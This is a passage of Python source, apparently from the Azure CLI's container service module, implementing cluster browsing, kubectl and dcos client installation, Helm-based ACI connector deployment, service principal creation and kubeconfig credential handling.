azure.mgmt.containerservice.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes from azure.mgmt.containerservice.v2018_03_31.models import ManagedCluster from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAADProfile from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.v2018_03_31.models import ManagedClusterAgentPoolProfile from azure.mgmt.containerservice.models import OpenShiftManagedClusterAgentPoolProfile from azure.mgmt.containerservice.models import OpenShiftAgentPoolProfileRole from azure.mgmt.containerservice.models import OpenShiftManagedClusterIdentityProvider from azure.mgmt.containerservice.models import OpenShiftManagedClusterAADIdentityProvider from azure.mgmt.containerservice.models import OpenShiftManagedCluster from azure.mgmt.containerservice.models import OpenShiftRouterProfile from azure.mgmt.containerservice.models import OpenShiftManagedClusterAuthProfile from azure.mgmt.containerservice.models import NetworkProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources logger 
= get_logger(__name__) # pylint:disable=too-many-lines,unused-argument def which(binary): path_var = os.getenv('PATH') if platform.system() == 'Windows': binary = binary + '.exe' parts = path_var.split(';') else: parts = path_var.split(':') for part in parts: bin_path = os.path.join(part, binary) if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK): return bin_path return None def wait_then_open(url): """ Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL. """ for _ in range(1, 10): try: urlopen(url, context=_ssl_context()) except URLError: time.sleep(1) break webbrowser.open_new_tab(url) def wait_then_open_async(url): """ Spawns a thread that waits for a bit then opens a URL. """ t = threading.Thread(target=wait_then_open, args=({url})) t.daemon = True t.start() def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None): """ Opens a browser to the web interface for the cluster orchestrator :param name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file) def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file): orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member if str(orchestrator_type).lower() == 'kubernetes' or \ orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \ (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file) elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos: return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) else: raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type)) def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Launch a proxy and browse the Kubernetes web UI. 
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file) def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml') if os.path.exists(browse_path): os.remove(browse_path) _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False) logger.warning('Proxy running on 127.0.0.1:8001/ui') logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1:8001/ui') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"]) def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser. :param name: name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: Path to the SSH key to use :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file): if not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) acs = acs_client.ACSClient() if not acs.connect(_get_host_name(acs_info), _get_username(acs_info), key_filename=ssh_key_file): raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info))) octarine_bin = '/opt/mesosphere/bin/octarine' if not acs.file_exists(octarine_bin): raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin)) proxy_id = _rand_str(16) proxy_cmd = '{} {}'.format(octarine_bin, proxy_id) acs.run(proxy_cmd, background=True) # Parse the output to get the remote PORT proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id) stdout, _ = acs.run(proxy_client_cmd) remote_port = int(stdout.read().decode().strip()) local_port = acs.get_available_local_port() # Set the proxy proxy.set_http_proxy('127.0.0.1', local_port) logger.warning('Proxy running on 127.0.0.1:%s', local_port) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1') try: acs.create_tunnel( remote_host='127.0.0.1', remote_port=remote_port, local_port=local_port) finally: proxy.disable_http_proxy() return def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None): acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member kwargs = {'install_location': install_location} if client_version: kwargs['client_version'] = client_version if orchestrator_type == 'kubernetes': return k8s_install_cli(**kwargs) elif orchestrator_type == 'dcos': return dcos_install_cli(**kwargs) else: raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type)) def _ssl_context(): if sys.version_info < (3, 4) or 
(in_cloud_console() and platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _urlretrieve(url, filename): req = urlopen(url, context=_ssl_context()) with open(filename, "wb") as f: f.write(req.read()) def dcos_install_cli(cmd, install_location=None, client_version='1.8'): """ Downloads the dcos command line from Mesosphere """ system = platform.system() if not install_location: raise CLIError( "No install location specified and it could not be determined from the current platform '{}'".format( system)) base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}' if system == 'Windows': file_url = base_url.format('windows', client_version, 'dcos.exe') elif system == 'Linux': # TODO Support ARM CPU here file_url = base_url.format('linux', client_version, 'dcos') elif system == 'Darwin': file_url = base_url.format('darwin', client_version, 'dcos') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to %s', install_location) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as err: raise CLIError('Connection error while attempting to download client ({})'.format(err)) def k8s_install_cli(cmd, client_version='latest', install_location=None): """Install kubectl, a command-line interface for Kubernetes clusters.""" source_url = "https://storage.googleapis.com/kubernetes-release/release" cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurechinacloud': source_url = 'https://mirror.azure.cn/kubernetes/kubectl' if client_version == 'latest': context = _ssl_context() version = urlopen(source_url + '/stable.txt', context=context).read() client_version = version.decode('UTF-8').strip() else: client_version = "v%s" % client_version file_url = '' system = platform.system() base_url = source_url + '/{}/bin/{}/amd64/{}' # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) if system == 'Windows': file_url = base_url.format(client_version, 'windows', 'kubectl.exe') elif system == 'Linux': # TODO: Support ARM CPU here file_url = base_url.format(client_version, 'linux', 'kubectl') elif system == 'Darwin': file_url = base_url.format(client_version, 'darwin', 'kubectl') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to "%s" from "%s"', install_location, file_url) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. 
Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group): from subprocess import PIPE, Popen instance = client.get(resource_group_name, name) helm_not_installed = 'Helm not detected, please verify if it is installed.' url_chart = chart_url if image_tag is None: image_tag = 'latest' # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # If SPN is specified, the secret should also be specified if service_principal is not None and client_secret is None: raise CLIError('--client-secret must be specified when --service-principal is specified') # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() # Validate the location upon the ACI avaiable regions _validate_aci_location(norm_location) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) subscription_id = _get_subscription_id(cmd.cli_ctx) # Get the TenantID profile = Profile(cli_ctx=cmd.cli_ctx) _, _, tenant_id = profile.get_login_credentials() # Check if we want the linux connector if os_type.lower() in ['linux', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Linux', instance.enable_rbac, instance.fqdn) # Check if we want the windows connector if os_type.lower() in ['windows', 'both']: _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, 'Windows', instance.enable_rbac, instance.fqdn) def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal, client_secret, subscription_id, tenant_id, aci_resource_group, norm_location, os_type, use_rbac, masterFqdn): rbac_install = "true" if use_rbac else "false" node_taint = 'azure.com/aci' helm_release_name = 
connector_name.lower() + '-' + os_type.lower() + '-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name k8s_master = 'https://{}'.format(masterFqdn) logger.warning("Deploying the ACI connector for '%s' using Helm", os_type) try: values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format( node_name, node_taint, os_type, image_tag, rbac_install) if service_principal: values += ",env.azureClientId=" + service_principal if client_secret: values += ",env.azureClientKey=" + client_secret if subscription_id: values += ",env.azureSubscriptionId=" + subscription_id if tenant_id: values += ",env.azureTenantId=" + tenant_id if aci_resource_group: values += ",env.aciResourceGroup=" + aci_resource_group if norm_location: values += ",env.aciRegion=" + norm_location # Currently, we need to set the master FQDN. # This is temporary and we should remove it when possible values += ",env.masterUri=" + k8s_master if helm_cmd == "install": subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values]) elif helm_cmd == "upgrade": subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values]) except subprocess.CalledProcessError as err: raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err)) def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, graceful=False, os_type='Linux'): from subprocess import PIPE, Popen helm_not_installed = "Error : Helm not detected, please verify if it is installed." # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # Get the credentials from a AKS instance _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = location.replace(' ', '').lower() if os_type.lower() in ['linux', 'both']: helm_release_name = connector_name.lower() + '-linux-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) if os_type.lower() in ['windows', 'both']: helm_release_name = connector_name.lower() + '-windows-' + norm_location node_name = 'virtual-kubelet-' + helm_release_name _undeploy_connector(graceful, node_name, helm_release_name) def _undeploy_connector(graceful, node_name, helm_release_name): if graceful: logger.warning('Graceful option selected, will try to drain the node first') from subprocess import PIPE, Popen kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.' 
try: Popen(["kubectl"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(kubectl_not_installed) try: drain_node = subprocess.check_output( ['kubectl', 'drain', node_name, '--force', '--delete-local-data'], universal_newlines=True) if not drain_node: raise CLIError('Could not find the node, make sure you' + ' are using the correct --os-type') except subprocess.CalledProcessError as err: raise CLIError('Could not find the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) logger.warning("Undeploying the '%s' using Helm", helm_release_name) try: subprocess.call(['helm', 'del', helm_release_name, '--purge']) except subprocess.CalledProcessError as err: raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err)) try: subprocess.check_output( ['kubectl', 'delete', 'node', node_name], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not delete the node, make sure you are using the correct' + ' --connector-name, --location and --os-type options: {}'.format(err)) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. 
except Exception as ex: # pylint: disable=broad-except logger.info(ex) time.sleep(2 + 2 * x) else: return False hook.add(message='Finished service principal creation', value=1.0, total_val=1.0) logger.info('Finished service principal creation') return service_principal def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0) logger.info('Waiting for AAD role to propagate') for x in range(0, 10): hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0) try: # TODO: break this out into a shared utility library create_role_assignment(cli_ctx, role, service_principal, scope=scope) break except CloudError as ex: if ex.message == 'The role assignment already exists.': break logger.info(ex.message) except: # pylint: disable=bare-except pass time.sleep(delay + delay * x) else: return False hook.add(message='AAD role propagation done', value=1.0, total_val=1.0) logger.info('AAD role propagation done') return True def _get_subscription_id(cli_ctx): _, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None) return sub_id def _get_default_dns_prefix(name, resource_group_name, subscription_id): # Use subscription id to provide uniqueness and prevent DNS name clashes name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10] if not name_part[0].isalpha(): name_part = (str('a') + name_part)[0:10] resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16] return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6]) def list_acs_locations(cmd, client): return { "productionRegions": regions_in_prod, "previewRegions": regions_in_preview } def _generate_windows_profile(windows, admin_username, admin_password): if windows: if not admin_password: raise CLIError('--admin-password is required.') if len(admin_password) < 6: raise CLIError('--admin-password must be at least 6 characters') windows_profile = { "adminUsername": admin_username, "adminPassword": admin_password, } return windows_profile return None def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile): master_pool_profile = {} default_master_pool_profile = { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', } if api_version == "2017-07-01": default_master_pool_profile = _update_dict(default_master_pool_profile, { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', "vmSize": master_vm_size, "osDiskSizeGB": int(master_osdisk_size), "vnetSubnetID": master_vnet_subnet_id, "firstConsecutiveStaticIP": master_first_consecutive_static_ip, "storageProfile": master_storage_profile, }) if not master_profile: master_pool_profile = default_master_pool_profile else: master_pool_profile = _update_dict(default_master_pool_profile, master_profile) return master_pool_profile def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile): agent_pool_profiles = [] default_agent_pool_profile = { "count": int(agent_count), "vmSize": agent_vm_size, "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', } if api_version == "2017-07-01": default_agent_pool_profile = 
_update_dict(default_agent_pool_profile, { "count": int(agent_count), "vmSize": agent_vm_size, "osDiskSizeGB": int(agent_osdisk_size), "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', "vnetSubnetID": agent_vnet_subnet_id, "ports": agent_ports, "storageProfile": agent_storage_profile, }) if agent_profiles is None: agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"})) else: # override agentPoolProfiles by using the passed in agent_profiles for idx, ap in enumerate(agent_profiles): # if the user specified dnsPrefix, we honor that # otherwise, we use the idx to avoid duplicate dns name a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap) agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a)) return agent_pool_profiles def _generate_outputs(name, orchestrator_type, admin_username): # define outputs outputs = { "masterFQDN": { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long }, "sshMaster0": { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long }, } if orchestrator_type.lower() != "kubernetes": outputs["agentFQDN"] = { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long } # override sshMaster0 for non-kubernetes scenarios outputs["sshMaster0"] = { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long } return outputs def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile): properties = { "orchestratorProfile": { "orchestratorType": orchestrator_type, }, "masterProfile": master_pool_profile, "agentPoolProfiles": agent_pool_profiles, "linuxProfile": { "ssh": { "publicKeys": [ { "keyData": ssh_key_value } ] }, "adminUsername": admin_username }, } if api_version == "2017-07-01": properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version if windows_profile is not None: properties["windowsProfile"] = windows_profile return properties # pylint: disable=too-many-locals def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None, location=None, admin_username="azureuser", api_version=None, master_profile=None, master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="", master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="", agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0, agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="", orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None, windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument validate=False, no_wait=False): """Create a new Acs. :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param deployment_name: The name of the deployment. 
:type deployment_name: str :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of the domain name and the regionalized DNS zone make up the fully qualified domain name associated with the public IP address. :type dns_name_prefix: str :param name: Resource name for the container service. :type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. :type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. 
Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = _get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, "location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here 
max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name, template, params, validate, no_wait) except CloudError as ex: retry_exception = ex if 'is not valid according to the validation procedure' in ex.message or \ 'The credentials in ServicePrincipalProfile were invalid' in ex.message or \ 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def store_acs_service_principal(subscription_id, client_secret, service_principal, file_name='acsServicePrincipal.json'): obj = {} if client_secret: obj['client_secret'] = client_secret if service_principal: obj['service_principal'] = service_principal config_path = os.path.join(get_config_dir(), file_name) full_config = load_service_principals(config_path=config_path) if not full_config: full_config = {} full_config[subscription_id] = obj with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600), 'w+') as spFile: json.dump(full_config, spFile) def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'): config_path = os.path.join(get_config_dir(), file_name) config = load_service_principals(config_path) if not config: return None return config.get(subscription_id) def load_service_principals(config_path): if not os.path.exists(config_path): return None fd = os.open(config_path, os.O_RDONLY) try: with os.fdopen(fd) as f: return shell_safe_json_parse(f.read()) except: # pylint: disable=bare-except return None def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait, subscription_id=None): from azure.mgmt.resource.resources import ResourceManagementClient from azure.mgmt.resource.resources.models import DeploymentProperties properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental') smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments if validate: logger.info('==== BEGIN TEMPLATE ====') logger.info(json.dumps(template, indent=2)) logger.info('==== END TEMPLATE ====') return smc.validate(resource_group_name, deployment_name, properties) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties) def k8s_get_credentials(cmd, client, name, resource_group_name, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), ssh_key_file=None, overwrite_existing=False): """Download and install kubectl credentials from the cluster master :param name: The name of the cluster. :type name: str :param resource_group_name: The name of the resource group. 
:type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if not addition[key]: return if existing[key] is None: existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: from knack.prompting import prompt_y_n, NoTTYException msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?' overwrite = False try: overwrite = prompt_y_n(msg.format(i['name'])) except NoTTYException: pass if overwrite: existing[key].remove(j) else: msg = 'A different object named {} already exists in 